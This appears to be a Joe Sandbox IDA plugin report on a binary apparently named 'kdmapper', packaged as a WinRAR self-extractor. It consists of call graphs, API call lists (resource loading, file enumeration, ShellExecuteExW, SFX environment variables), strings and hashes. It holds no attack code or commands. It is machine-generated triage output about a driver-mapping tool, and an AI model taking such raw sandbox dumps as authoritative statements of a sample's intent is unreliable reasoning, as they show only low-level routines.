23432->23439 23442 dfc793 _wcslen _wcsrchr 23433->23442 23460 dfd78f 23433->23460 23436 dfd40a 23438 df1fbb CompareStringW 23438->23439 23439->23433 23439->23438 23440 dfca67 SetWindowTextW 23440->23442 23442->23436 23442->23440 23446 dfc855 SetFileAttributesW 23442->23446 23451 dfcc31 GetDlgItem SetWindowTextW SendMessageW 23442->23451 23454 dfcc71 SendMessageW 23442->23454 23459 df1fbb CompareStringW 23442->23459 23484 dfb314 23442->23484 23488 dfa64d GetCurrentDirectoryW 23442->23488 23493 dea5d1 6 API calls 23442->23493 23494 dea55a FindClose 23442->23494 23495 dfb48e 76 API calls 2 library calls 23442->23495 23496 e03e3e 23442->23496 23448 dfc90f GetFileAttributesW 23446->23448 23458 dfc86f __cftof _wcslen 23446->23458 23448->23442 23450 dfc921 DeleteFileW 23448->23450 23450->23442 23452 dfc932 23450->23452 23451->23442 23490 de4092 23452->23490 23454->23442 23456 dfc967 MoveFileW 23456->23442 23457 dfc97f MoveFileExW 23456->23457 23457->23442 23458->23442 23458->23448 23489 deb991 51 API calls 3 library calls 23458->23489 23459->23442 23461 dfd799 __cftof _wcslen 23460->23461 23462 dfd9c0 23461->23462 23463 dfd8a5 23461->23463 23464 dfd9e7 23461->23464 23512 df1fbb CompareStringW 23461->23512 23462->23464 23467 dfd9de ShowWindow 23462->23467 23509 dea231 23463->23509 23464->23442 23467->23464 23469 dfd8d9 ShellExecuteExW 23469->23464 23476 dfd8ec 23469->23476 23471 dfd8d1 23471->23469 23472 dfd925 23514 dfdc3b 6 API calls 23472->23514 23473 dfd97b CloseHandle 23474 dfd989 23473->23474 23475 dfd994 23473->23475 23515 df1fbb CompareStringW 23474->23515 23475->23462 23476->23472 23476->23473 23478 dfd91b ShowWindow 23476->23478 23478->23472 23480 dfd93d 23480->23473 23481 dfd950 GetExitCodeProcess 23480->23481 23481->23473 23482 dfd963 23481->23482 23482->23473 23485 dfb31e 23484->23485 23486 dfb3f0 ExpandEnvironmentStringsW 23485->23486 23487 dfb40d 23485->23487 23486->23487 23487->23442 23488->23442 23489->23458 23530 de4065 23490->23530 23493->23442 23494->23442 23495->23442 23497 e08e54 23496->23497 23498 e08e61 23497->23498 23499 e08e6c 23497->23499 23610 e08e06 23498->23610 23501 e08e74 23499->23501 23502 e08e7d __dosmaperr 23499->23502 23503 e08dcc _free 20 API calls 23501->23503 23504 e08e82 23502->23504 23505 e08ea7 HeapReAlloc 23502->23505 23618 e07a5e 7 API calls 2 library calls 23502->23618 23506 e08e69 23503->23506 23617 e091a8 20 API calls __dosmaperr 23504->23617 23505->23502 23505->23506 23506->23442 23516 dea243 23509->23516 23512->23463 23513 deb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23513->23471 23514->23480 23515->23475 23524 dfec50 23516->23524 23519 dea23a 23519->23469 23519->23513 23520 dea261 23526 debb03 23520->23526 23522 dea275 23522->23519 23523 dea279 GetFileAttributesW 23522->23523 23523->23519 23525 dea250 GetFileAttributesW 23524->23525 23525->23519 23525->23520 23527 debb10 _wcslen 23526->23527 23528 debbb8 GetCurrentDirectoryW 23527->23528 23529 debb39 _wcslen 23527->23529 23528->23529 23529->23522 23531 de407c __vswprintf_c_l 23530->23531 23534 e05fd4 23531->23534 23537 e04097 23534->23537 23538 e040d7 23537->23538 23539 e040bf 23537->23539 23538->23539 23541 e040df 23538->23541 23554 e091a8 20 API calls __dosmaperr 23539->23554 23556 e04636 23541->23556 23542 e040c4 23555 e09087 26 API calls ___std_exception_copy 23542->23555 23548 e04167 23565 e049e6 51 API calls 4 library calls 23548->23565 23549 de4086 GetFileAttributesW 23549->23452 23549->23456 23552 e040cf 23567 dffbbc 23552->23567 23553 e04172 23566 e046b9 20 API calls _free 23553->23566 23554->23542 23555->23552 23557 e04653 23556->23557 23558 e040ef 23556->23558 23557->23558 23574 e097e5 GetLastError 23557->23574 23564 e04601 20 API calls 2 library calls 23558->23564 23560 e04674 23595 e0993a 38 API calls __fassign 23560->23595 23562 e0468d 23596 e09967 38 API calls __fassign 23562->23596 23564->23548 23565->23553 23566->23552 23568 dffbc5 IsProcessorFeaturePresent 23567->23568 23569 dffbc4 23567->23569 23571 dffc07 23568->23571 23569->23549 23609 dffbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23571->23609 23573 dffcea 23573->23549 23575 e09807 23574->23575 23576 e097fb 23574->23576 23598 e0b136 20 API calls __dosmaperr 23575->23598 23597 e0ae5b 11 API calls 2 library calls 23576->23597 23579 e09801 23579->23575 23581 e09850 SetLastError 23579->23581 23580 e09813 23582 e0981b 23580->23582 23605 e0aeb1 11 API calls 2 library calls 23580->23605 23581->23560 23599 e08dcc 23582->23599 23584 e09830 23584->23582 23586 e09837 23584->23586 23606 e09649 20 API calls __dosmaperr 23586->23606 23587 e09821 23589 e0985c SetLastError 23587->23589 23607 e08d24 38 API calls _abort 23589->23607 23590 e09842 23592 e08dcc _free 20 API calls 23590->23592 23594 e09849 23592->23594 23594->23581 23594->23589 23595->23562 23596->23558 23597->23579 23598->23580 23600 e08dd7 RtlFreeHeap 23599->23600 23604 e08e00 __dosmaperr 23599->23604 23601 e08dec 23600->23601 23600->23604 23608 e091a8 20 API calls __dosmaperr 23601->23608 23603 e08df2 GetLastError 23603->23604 23604->23587 23605->23584 23606->23590 23608->23603 23609->23573 23611 e08e44 23610->23611 23615 e08e14 __dosmaperr 23610->23615 23620 e091a8 20 API calls __dosmaperr 23611->23620 23613 e08e2f RtlAllocateHeap 23614 e08e42 23613->23614 23613->23615 23614->23506 23615->23611 23615->23613 23619 e07a5e 7 API calls 2 library calls 23615->23619 23617->23506 23618->23502 23619->23615 23620->23614 25339 e08268 55 API calls _free 25340 dfe455 14 API calls ___delayLoadHelper2@8 25390 e07f6e 52 API calls 3 library calls 23757 dfe44b 23758 dfe3f4 23757->23758 23759 dfe85d ___delayLoadHelper2@8 14 API calls 23758->23759 23759->23758 25342 dfa440 GdipCloneImage GdipAlloc 25343 e03a40 5 API calls CatchGuardHandler 25393 e11f40 CloseHandle 23806 de9f7a 23807 de9f8f 23806->23807 23808 de9f88 23806->23808 23809 de9f9c GetStdHandle 23807->23809 23811 de9fab 23807->23811 23809->23811 23810 dea003 WriteFile 23810->23811 23811->23808 23811->23810 23812 de9fd4 WriteFile 23811->23812 23813 de9fcf 23811->23813 23815 dea095 23811->23815 23817 de6baa 78 API calls 23811->23817 23812->23811 23812->23813 23813->23811 23813->23812 23818 de6e98 77 API calls 23815->23818 23817->23811 23818->23808 23820 de9a74 23824 de9a7e 23820->23824 23821 de9b9d SetFilePointer 23822 de9ab1 23821->23822 23823 de9bb6 GetLastError 23821->23823 23823->23822 23824->23821 23824->23822 23826 de9b79 23824->23826 23827 de981a 23824->23827 23826->23821 23828 de9833 23827->23828 23831 de9e80 23828->23831 23832 de9e92 23831->23832 23836 de9ea5 23831->23836 23835 de9865 23832->23835 23840 de6d5b 77 API calls 23832->23840 23834 de9eb8 SetFilePointer 23834->23835 23837 de9ed4 GetLastError 23834->23837 23835->23826 23836->23834 23836->23835 23837->23835 23838 de9ede 23837->23838 23838->23835 23841 de6d5b 77 API calls 23838->23841 23840->23836 23841->23835 25345 de1075 84 API calls 25395 de1f72 128 API calls __EH_prolog 25346 dfa070 10 API calls 25348 dfb270 99 API calls 25349 dfc793 107 API calls 5 library calls 25351 e0f421 21 API calls __vswprintf_c_l 25401 de1710 86 API calls 25402 dfad10 73 API calls 24719 e0bb30 24720 e0bb39 24719->24720 24721 e0bb42 24719->24721 24723 e0ba27 24720->24723 24724 e097e5 _abort 38 API calls 24723->24724 24725 e0ba34 24724->24725 24743 e0bb4e 24725->24743 24727 e0ba3c 24752 e0b7bb 24727->24752 24730 e0ba53 24730->24721 24731 e08e06 __vswprintf_c_l 21 API calls 24732 e0ba64 24731->24732 24738 e0ba96 24732->24738 24759 e0bbf0 24732->24759 24735 e08dcc _free 20 API calls 24735->24730 24736 e0ba91 24769 e091a8 20 API calls __dosmaperr 24736->24769 24738->24735 24739 e0bada 24739->24738 24770 e0b691 26 API calls 24739->24770 24740 e0baae 24740->24739 24741 e08dcc _free 20 API calls 24740->24741 24741->24739 24744 e0bb5a __FrameHandler3::FrameUnwindToState 24743->24744 24745 e097e5 _abort 38 API calls 24744->24745 24750 e0bb64 24745->24750 24747 e0bbe8 _abort 24747->24727 24750->24747 24751 e08dcc _free 20 API calls 24750->24751 24771 e08d24 38 API calls _abort 24750->24771 24772 e0ac31 EnterCriticalSection 24750->24772 24773 e0bbdf LeaveCriticalSection _abort 24750->24773 24751->24750 24753 e04636 __fassign 38 API calls 24752->24753 24754 e0b7cd 24753->24754 24755 e0b7dc GetOEMCP 24754->24755 24756 e0b7ee 24754->24756 24758 e0b805 24755->24758 24757 e0b7f3 GetACP 24756->24757 24756->24758 24757->24758 24758->24730 24758->24731 24760 e0b7bb 40 API calls 24759->24760 24761 e0bc0f 24760->24761 24764 e0bc60 IsValidCodePage 24761->24764 24766 e0bc16 24761->24766 24768 e0bc85 __cftof 24761->24768 24762 dffbbc CatchGuardHandler 5 API calls 24763 e0ba89 24762->24763 24763->24736 24763->24740 24765 e0bc72 GetCPInfo 24764->24765 24764->24766 24765->24766 24765->24768 24766->24762 24774 e0b893 GetCPInfo 24768->24774 24769->24738 24770->24738 24772->24750 24773->24750 24775 e0b977 24774->24775 24781 e0b8cd 24774->24781 24778 dffbbc CatchGuardHandler 5 API calls 24775->24778 24780 e0ba23 24778->24780 24780->24766 24784 e0c988 24781->24784 24783 e0ab78 __vswprintf_c_l 43 API calls 24783->24775 24785 e04636 __fassign 38 API calls 24784->24785 24786 e0c9a8 MultiByteToWideChar 24785->24786 24788 e0c9e6 24786->24788 24789 e0ca7e 24786->24789 24792 e08e06 __vswprintf_c_l 21 API calls 24788->24792 24795 e0ca07 __cftof __vsnwprintf_l 24788->24795 24790 dffbbc CatchGuardHandler 5 API calls 24789->24790 24793 e0b92e 24790->24793 24791 e0ca78 24803 e0abc3 20 API calls _free 24791->24803 24792->24795 24798 e0ab78 24793->24798 24795->24791 24796 e0ca4c MultiByteToWideChar 24795->24796 24796->24791 24797 e0ca68 GetStringTypeW 24796->24797 24797->24791 24799 e04636 __fassign 38 API calls 24798->24799 24800 e0ab8b 24799->24800 24804 e0a95b 24800->24804 24803->24789 24805 e0a976 __vswprintf_c_l 24804->24805 24806 e0a99c MultiByteToWideChar 24805->24806 24807 e0a9c6 24806->24807 24818 e0ab50 24806->24818 24808 e0a9e7 __vsnwprintf_l 24807->24808 24813 e08e06 __vswprintf_c_l 21 API calls 24807->24813 24811 e0aa30 MultiByteToWideChar 24808->24811 24812 e0aa9c 24808->24812 24809 dffbbc CatchGuardHandler 5 API calls 24810 e0ab63 24809->24810 24810->24783 24811->24812 24814 e0aa49 24811->24814 24840 e0abc3 20 API calls _free 24812->24840 24813->24808 24831 e0af6c 24814->24831 24818->24809 24819 e0aa73 24819->24812 24822 e0af6c __vswprintf_c_l 11 API calls 24819->24822 24820 e0aaab 24821 e08e06 __vswprintf_c_l 21 API calls 24820->24821 24825 e0aacc __vsnwprintf_l 24820->24825 24821->24825 24822->24812 24823 e0ab41 24839 e0abc3 20 API calls _free 24823->24839 24825->24823 24826 e0af6c __vswprintf_c_l 11 API calls 24825->24826 24827 e0ab20 24826->24827 24827->24823 24828 e0ab2f WideCharToMultiByte 24827->24828 24828->24823 24829 e0ab6f 24828->24829 24841 e0abc3 20 API calls _free 24829->24841 24832 e0ac98 __dosmaperr 5 API calls 24831->24832 24833 e0af93 24832->24833 24836 e0af9c 24833->24836 24842 e0aff4 10 API calls 3 library calls 24833->24842 24835 e0afdc LCMapStringW 24835->24836 24837 dffbbc CatchGuardHandler 5 API calls 24836->24837 24838 e0aa60 24837->24838 24838->24812 24838->24819 24838->24820 24839->24812 24840->24818 24841->24812 24842->24835 25352 e0c030 GetProcessHeap 25353 dfa400 GdipDisposeImage GdipFree 25354 dfd600 70 API calls 25355 e06000 QueryPerformanceFrequency QueryPerformanceCounter 25357 e0f200 51 API calls 25404 e02900 6 API calls 4 library calls 25406 e0a700 21 API calls 25408 dff530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25409 dfff30 LocalFree 25361 de1025 29 API calls 25362 dfc220 93 API calls _swprintf

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DF0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00DF087C
                                                                                                                                                                                                                • Part of subcall function 00DF0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DF088E
                                                                                                                                                                                                                • Part of subcall function 00DF0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DF08BF
                                                                                                                                                                                                                • Part of subcall function 00DFA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00DFA655
                                                                                                                                                                                                                • Part of subcall function 00DFAC16: OleInitialize.OLE32(00000000), ref: 00DFAC2F
                                                                                                                                                                                                                • Part of subcall function 00DFAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DFAC66
                                                                                                                                                                                                                • Part of subcall function 00DFAC16: SHGetMalloc.SHELL32(00E28438), ref: 00DFAC70
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00DFDF5C
                                                                                                                                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00DFDF83
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00DFDF94
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00DFDFCE
                                                                                                                                                                                                                • Part of subcall function 00DFDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00DFDBF4
                                                                                                                                                                                                                • Part of subcall function 00DFDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00DFDC30
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DFDFD7
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00E3EC90,00000800), ref: 00DFDFF2
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00E3EC90), ref: 00DFDFFE
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00DFE009
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFE048
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00DFE05A
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00DFE061
                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 00DFE078
                                                                                                                                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00DFE0C9
                                                                                                                                                                                                              • Sleep.KERNEL32(?), ref: 00DFE0F7
                                                                                                                                                                                                              • DeleteObject.GDI32 ref: 00DFE130
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00DFE140
                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00DFE183
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
                                                                                                                                                                                                              • API String ID: 3049964643-1042931266
                                                                                                                                                                                                              • Opcode ID: 75f201f272fd8f44173124bbe9267f9087da5cc25eb784e69470d65f3691c065
                                                                                                                                                                                                              • Instruction ID: 87ccb68cb25ff7ae8b5b7c721df1a3ef9cc8825e76d968bc76618ee9f2753ec3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75f201f272fd8f44173124bbe9267f9087da5cc25eb784e69470d65f3691c065
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2561C371904388AFD320AF76EC49F7B7BA9EF49700F058429FA45B22A1DA749948C771

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 812 dfa6c2-dfa6df FindResourceW 813 dfa7db 812->813 814 dfa6e5-dfa6f6 SizeofResource 812->814 815 dfa7dd-dfa7e1 813->815 814->813 816 dfa6fc-dfa70b LoadResource 814->816 816->813 817 dfa711-dfa71c LockResource 816->817 817->813 818 dfa722-dfa737 GlobalAlloc 817->818 819 dfa73d-dfa746 GlobalLock 818->819 820 dfa7d3-dfa7d9 818->820 821 dfa7cc-dfa7cd GlobalFree 819->821 822 dfa74c-dfa76a call e00320 CreateStreamOnHGlobal 819->822 820->815 821->820 825 dfa76c-dfa78e call dfa626 822->825 826 dfa7c5-dfa7c6 GlobalUnlock 822->826 825->826 831 dfa790-dfa798 825->831 826->821 832 dfa79a-dfa7ae GdipCreateHBITMAPFromBitmap 831->832 833 dfa7b3-dfa7c1 831->833 832->833 834 dfa7b0 832->834 833->826 834->833
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00DFB73D,00000066), ref: 00DFA6D5
                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA6EC
                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA703
                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA712
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00DFB73D,00000066), ref: 00DFA72D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00DFA73E
                                                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00DFA762
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00DFA7C6
                                                                                                                                                                                                                • Part of subcall function 00DFA626: GdipAlloc.GDIPLUS(00000010), ref: 00DFA62C
                                                                                                                                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00DFA7A7
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00DFA7CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                                                                                              • String ID: PNG
                                                                                                                                                                                                              • API String ID: 211097158-364855578
                                                                                                                                                                                                              • Opcode ID: e7dc6f3bc5f04e709de03bf61a1ac3b297384a67997ce787ea61dcb753576511
                                                                                                                                                                                                              • Instruction ID: e349556f631e5cfc28635ffa36f6535604bc8e12a63b23dc40eb0f4ca36182c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7dc6f3bc5f04e709de03bf61a1ac3b297384a67997ce787ea61dcb753576511
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3631D5B5601306BFC710AF36DC48D6BBFB9EF84760B058529F909A2260EB31DD48CA71

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1025 dea69b-dea6bf call dfec50 1028 dea727-dea730 FindNextFileW 1025->1028 1029 dea6c1-dea6ce FindFirstFileW 1025->1029 1030 dea742-dea7ff call df0602 call dec310 call df15da * 3 1028->1030 1031 dea732-dea740 GetLastError 1028->1031 1029->1030 1032 dea6d0-dea6e2 call debb03 1029->1032 1036 dea804-dea811 1030->1036 1033 dea719-dea722 1031->1033 1040 dea6fe-dea707 GetLastError 1032->1040 1041 dea6e4-dea6fc FindFirstFileW 1032->1041 1033->1036 1043 dea709-dea70c 1040->1043 1044 dea717 1040->1044 1041->1030 1041->1040 1043->1044 1045 dea70e-dea711 1043->1045 1044->1033 1045->1044 1047 dea713-dea715 1045->1047 1047->1033
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6C4
                                                                                                                                                                                                                • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6F2
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6FE
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA728
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA734
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 42610566-0
                                                                                                                                                                                                              • Opcode ID: d3f722a0bb72b68dce2c372736627a83ecfeb12eb36ceb3410201596956eb12d
                                                                                                                                                                                                              • Instruction ID: d3a4f651df838d15c258a79cb02229efc3e3e92c5290c387a3c5a99908d4c78a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3f722a0bb72b68dce2c372736627a83ecfeb12eb36ceb3410201596956eb12d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9441717650055AABCB25EF69CC84AEDB7B8FB48350F144196E569E3200D734AE94CFA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00E07DC4,00000000,00E1C300,0000000C,00E07F1B,00000000,00000002,00000000), ref: 00E07E0F
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00E07DC4,00000000,00E1C300,0000000C,00E07F1B,00000000,00000002,00000000), ref: 00E07E16
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00E07E28
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                              • Opcode ID: 500340890a7e0abcaace455d8e77e85a64a693f486aefde2dc0f2f814503c7e2
                                                                                                                                                                                                              • Instruction ID: 49a61a3f8041b19b00dabe213cbec6c79c97a09dce64d8680641990c65dd7e28
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 500340890a7e0abcaace455d8e77e85a64a693f486aefde2dc0f2f814503c7e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73E08631441144EFCF016F21CD099893FAAEF04341F008458F849BB172CB36EE96CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                              • Opcode ID: b6e06cb06840a69392cb797dbf089810378346b50292151f0198a77709fa8696
                                                                                                                                                                                                              • Instruction ID: 31ab248d924ffa957755134ef82008273abdf85df2200d34dd2e643c19524aa9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6e06cb06840a69392cb797dbf089810378346b50292151f0198a77709fa8696
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A382F9709042C5AEDF15EF65C891BFABBB9AF15300F0C41B9E84D9B182DB315A88DB70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DFB7E5
